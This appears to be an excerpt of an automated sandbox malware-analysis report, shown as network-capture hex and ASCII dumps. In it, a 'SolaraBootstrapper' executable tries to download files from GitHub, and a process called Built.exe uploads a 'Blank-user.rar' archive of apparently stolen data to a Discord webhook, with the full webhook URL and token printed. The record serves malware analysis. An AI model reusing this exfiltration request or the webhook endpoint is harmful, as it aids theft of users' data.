                                                                    Data Ascii: type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-f9b958f5f2df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://g
                                                                    2024-08-05 12:32:07 UTC1370INData Raw: 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 31 35 63 64 66 61 2d 33 30 37 37 64 62 61 61 66 63 33 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63
                                                                    Data Ascii: cript crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-15cdfa-3077dbaafc30.js"></script><script c
                                                                    2024-08-05 12:32:07 UTC1370INData Raw: 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6c 69 74 2d 68 74 6d 6c 5f 6c 69 74 2d 68 74 6d 6c 5f 6a 73 2d 63 65 37 32 32 35 61 33 30 34 63 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73
                                                                    Data Ascii: pplication/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets
                                                                    2024-08-05 12:32:07 UTC1370INData Raw: 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 35 33 62 34 32 33 65 64 65 33 32 61 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62
                                                                    Data Ascii: ub.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-53b423ede32a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.github


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449732185.199.108.1334437248C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-08-05 12:32:07 UTC135OUTGET /quivings/Solara/main/Storage/version.txt HTTP/1.1
                                                                    User-Agent: Solara
                                                                    Host: raw.githubusercontent.com
                                                                    Connection: Keep-Alive
                                                                    2024-08-05 12:32:08 UTC797INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    Content-Length: 14
                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Frame-Options: deny
                                                                    X-XSS-Protection: 1; mode=block
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    X-GitHub-Request-Id: B090:27A6E7:1689912:191F432:66B0C646
                                                                    Accept-Ranges: bytes
                                                                    Date: Mon, 05 Aug 2024 12:32:08 GMT
                                                                    Via: 1.1 varnish
                                                                    X-Served-By: cache-ewr18173-EWR
                                                                    X-Cache: MISS
                                                                    X-Cache-Hits: 0
                                                                    X-Timer: S1722861128.013060,VS0,VE9
                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                    Access-Control-Allow-Origin: *
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    X-Fastly-Request-ID: d42a565218eb15c8bad48e7c7ffb3796b47dc347
                                                                    Expires: Mon, 05 Aug 2024 12:37:08 GMT
                                                                    Source-Age: 0
                                                                    2024-08-05 12:32:08 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                                    Data Ascii: 404: Not Found


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.449733140.82.121.44437248C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-08-05 12:32:08 UTC81OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                                                                    Host: github.com
                                                                    2024-08-05 12:32:09 UTC473INHTTP/1.1 404 Not Found
                                                                    Server: GitHub.com
                                                                    Date: Mon, 05 Aug 2024 12:32:06 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                    Cache-Control: no-cache
                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                    X-Frame-Options: deny
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 0
                                                                    Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                    2024-08-05 12:32:09 UTC3188INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                    2024-08-05 12:32:09 UTC449INData Raw: 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefetch"
                                                                    2024-08-05 12:32:09 UTC1370INData Raw: 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 20 20 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22
                                                                    Data Ascii: rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous"
                                                                    2024-08-05 12:32:09 UTC1370INData Raw: 73 74 2d 37 39 62 63 61 37 31 34 35 33 39 33 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 66 65 34 31 33 37 62 35 34 62 32 36 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67
                                                                    Data Ascii: st-79bca7145393.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css" /><link data-color-theme="dark_tritanopia" crossorig
                                                                    2024-08-05 12:32:09 UTC1370INData Raw: 72 64 5f 61 63 63 65 73 73 69 62 69 6c 69 74 79 22 2c 22 68 6f 76 65 72 63 61 72 64 5f 6c 6f 6e 67 65 72 5f 61 63 74 69 76 61 74 65 5f 74 69 6d 65 6f 75 74 22 2c 22 6d 61 72 6b 65 74 69 6e 67 5f 70 61 67 65 73 5f 73 65 61 72 63 68 5f 65 78 70 6c 6f 72 65 5f 70 72 6f 76 69 64 65 72 22 2c 22 72 65 6d 6f 76 65 5f 63 68 69 6c 64 5f 70 61 74 63 68 22 2c 22 73 61 6d 70 6c 65 5f 6e 65 74 77 6f 72 6b 5f 63 6f 6e 6e 5f 74 79 70 65 22 2c 22 73 69 74 65 5f 6d 65 74 65 72 65 64 5f 62 69 6c 6c 69 6e 67 5f 75 70 64 61 74 65 22 2c 22 74 75 72 62 6f 5f 65 78 70 65 72 69 6d 65 6e 74 5f 72 69 73 6b 79 22 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22
                                                                    Data Ascii: rd_accessibility","hovercard_longer_activate_timeout","marketing_pages_search_explore_provider","remove_child_patch","sample_network_conn_type","site_metered_billing_update","turbo_experiment_risky"]}</script><script crossorigin="anonymous" defer="defer"
                                                                    2024-08-05 12:32:09 UTC1370INData Raw: 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 66 6f 63 75 73 2d 7a 6f 6e 65 5f 6a 73 2d 63 39 30 38 36 61 34 66 62 36 32 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75
                                                                    Data Ascii: 3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-c9086a4fb62b.js"></script><script crossorigin="anonymou
                                                                    2024-08-05 12:32:09 UTC1370INData Raw: 34 38 66 66 30 34 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 65 6c 65 6d 65 6e 74 5f 2d 37 38 32 63 61 35 2d 35 34 37 36 33 63 64 35 35 62 39 36
                                                                    Data Ascii: 48ff048.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_clipboard-copy-element_-782ca5-54763cd55b96
                                                                    2024-08-05 12:32:09 UTC1370INData Raw: 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 62 72 61 69 6e 74 72 65 65 5f 62 72 6f 77 73 65 72 2d 64 65 74 65 63 74 69 6f 6e 5f 64 69 73 74 5f 62 72 6f 77 73 65 72 2d 64 65 74 65 63 74 69 6f 6e 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 2d 36 38 38 33 35 64 2d 61 31 38 32 32 30 66 31 64 62 38 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65
                                                                    Data Ascii: s" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_stack-68835d-a18220f1db8d.js"></script><script crossorigin="anonymous" defe
                                                                    2024-08-05 12:32:09 UTC1370INData Raw: 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 30 65 30 37 63 63 31 38 33 65 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20
                                                                    Data Ascii: sorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript"
                                                                    2024-08-05 12:32:09 UTC1370INData Raw: 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 74 69 63 6b 79 2d 73 63 72 6f 6c 6c 2d 69 6e 74 6f 2d 76 69 65 77 5f 74 73 2d 37 38 63 65 31 63 38 37 38 32 66 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63
                                                                    Data Ascii: ript crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-78ce1c8782f5.js"></script><script crossorigin="anonymous" defer="defer" type="applic


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.449744162.159.135.2334436252C:\Users\user\AppData\Local\Temp\Built.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-08-05 12:32:36 UTC305OUTPOST /api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq HTTP/1.1
                                                                    Host: discordapp.com
                                                                    Accept-Encoding: identity
                                                                    Content-Length: 688920
                                                                    User-Agent: python-urllib3/2.2.2
                                                                    Content-Type: multipart/form-data; boundary=0e3213dce644b7bfaf68d16c9fe0b5b3
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: 2d 2d 30 65 33 32 31 33 64 63 65 36 34 34 62 37 62 66 61 66 36 38 64 31 36 63 39 66 65 30 62 35 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 cf e2 c0 8f 21 04 00 00 01 0f 3b 87 9b 39 8e 76 9e be 1d b1 bb 12 0a 52 70 54 66 85 b3 4c 94 59 f2 4c 30 78 ff ac 80 ff 23 75 7e e4 38 f3 0e 3b 2d 9e 17 32 79 82 2c 46 5d 72 c4 43 d2 60 a2 7a 1b ac 8d 62 a2 c2 be 3a 6a 24 c5 4b 0e 1d 2c e9 8e aa b3 a0 73 f0 f3 77 61 f2 10 e8 56 66 70 1b
                                                                    Data Ascii: --0e3213dce644b7bfaf68d16c9fe0b5b3Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!;9vRpTfLYL0x#u~8;-2y,F]rC`zb:j$K,swaVfp
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: 8a 8a 2e a2 8b 76 b5 1d d1 24 87 76 25 b0 d0 70 6c 3e 3c 5d 6c a6 0b 63 e6 31 9e 35 9b c7 e9 a2 ca 7d 5f cf 4e 9b 0c 9d a6 0b 7a 15 90 ca 5b 81 7a e2 0f 39 b5 cc f6 0c 34 7d ca de 6f 56 ec ff 5a 5e 3a 77 38 c5 f9 c8 b6 3c 10 ae e3 a2 35 ea d0 bd fe 40 09 13 c9 ad 9d c1 1d 2d c0 e1 85 a5 ee c3 27 9b 5a d7 03 4b 46 bb 58 b4 04 31 45 e7 72 38 82 d8 31 f5 1d 32 7b 8e 64 5e 18 c3 f3 77 f8 fe 6e 3a 37 0d 06 b5 21 ff 15 0b 34 29 39 da 3e e8 0c a4 36 ec 7c b8 2f 6a 11 59 f1 40 cc ad 45 7d 77 72 09 c4 84 ad 14 29 1a 96 8a 5e 26 ce 15 42 b7 f2 ee 0a 5f b1 26 6f a6 40 d7 e6 9c ea 2f 94 70 25 f7 e3 61 95 f3 4c 20 f3 bf 13 27 79 5c 50 79 5f 0d 0f ae 26 bb 13 3a 24 64 1d 2f 17 4a 8d 8b 44 d8 e7 bd 9b df cb 3a ad 09 b1 b6 38 ac 1e e1 01 d3 28 a1 ae 88 0d 67 c7 76 83 d0
                                                                    Data Ascii: .v$v%pl><]lc15}_Nz[z94}oVZ^:w8<5@-'ZKFX1Er812{d^wn:7!4)9>6|/jY@E}wr)^&B_&o@/p%aL 'y\Py_&:$d/JD:8(gv
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: 88 b4 7a c1 fc f5 73 ef ef 3b e3 2d 31 1b 52 f7 3e 5b 19 71 9c a1 d3 08 99 8c 4f c0 11 64 e2 23 6c 32 3f 77 9b 7c 09 b5 9b 01 a8 7d fd 5e f9 ec 7e 41 00 b3 30 b8 a3 da 4d ba 7d d7 15 8f 38 06 cb 9b 17 d6 4f 60 d2 a6 4b 25 70 98 e3 9f ab a9 ab c7 a6 4b 91 3e 6f 1b 81 54 12 cf b9 e1 30 f7 c8 f9 e3 35 6f 9c 99 4b 4b d6 ce cd cc 41 d0 d3 41 a5 2e eb 74 7b b0 68 ff 7c b4 a6 70 ca 13 07 08 de 3a bf 17 05 3f 37 fe 3d 52 a6 95 6d 4c 70 77 8d 7e 0a a7 fe 8b af 74 20 ea 6b ee a1 1f 26 92 2f 6c 6f 65 f5 2b 06 07 fd 66 ed 98 fc ef 56 2a a3 9d c7 3a 49 c1 1c ea 51 81 5b 67 ce f2 11 7a 0f 0c 49 db d3 bd 90 45 b1 6e 7b 06 07 89 32 f8 b8 4d 44 55 1d 08 66 f2 1e 6d b4 86 5b 46 11 44 99 bb 67 a7 e7 d0 4d f3 10 b2 47 b0 e7 a5 84 40 b8 51 3a de 36 1b 7e 88 14 d1 df 34 b2 ae
                                                                    Data Ascii: zs;-1R>[qOd#l2?w|}^~A0M}8O`K%pK>oT05oKKAA.t{h|p:?7=RmLpw~t k&/loe+fV*:IQ[gzIEn{2MDUfm[FDgMG@Q:6~4
                                                                    2024-08-05 12:32:36 UTC16384OUTData Raw: 94 f6 6e e4 37 37 11 a4 95 f6 65 2e b6 91 7a a5 08 1a 03 50 36 0c f0 76 f0 75 91 7e cd 29 58 6c 44 06 fd fe 5e dc da 6f 88 e1 58 7a 40 30 39 1a 70 e0 8c e2 01 f4 c5 2a 3e c3 cf 69 b8 c9 34 d4 a8 2e ee 30 85 e0 6b 74 aa b4 49 44 7a fc 7d ae ac cb c9 a7 fa ee ba c9 46 e0 5a 94 f5 45 72 22 5b ad be b1 75 33 12 29 ff 78 9b 5e 5d 02 c6 2b 5f 66 b1 7c 08 b5 95 a7 cc c8 ae 54 f5 59 01 3c a9 d9 fa 69 88 53 28 3b c6 fc 23 d3 bc c6 e7 35 d3 9b a0 72 26 68 e6 10 d3 e5 a9 ff 53 fa 91 e5 8b 70 6c b5 4e f2 c9 87 4e 3c 2f 25 99 0e 73 28 3e b6 eb 0e 1e 6b 89 08 ce 2b 32 9d e0 55 13 7f 75 52 a6 03 20 ab a0 a0 c5 6c 0f e7 2c 5e b6 82 67 df 2e dc 60 42 1a 1b 79 9b 68 82 64 ec e2 cb 45 84 d2 81 d8 09 ad bd 00 64 6c 42 31 28 24 f7 e5 bc 3d bc 4c 9e 5f a2 66 9d 85 d3 60 7e fe
                                                                    Data Ascii: n77e.zP6vu~)XlD^oXz@09p*>i4.0ktIDz}FZEr"[u3)x^]+_f|TY<iS(;#5r&hSplNN</%s(>k+2UuR l,^g.`ByhdEdlB1($=L_f`~
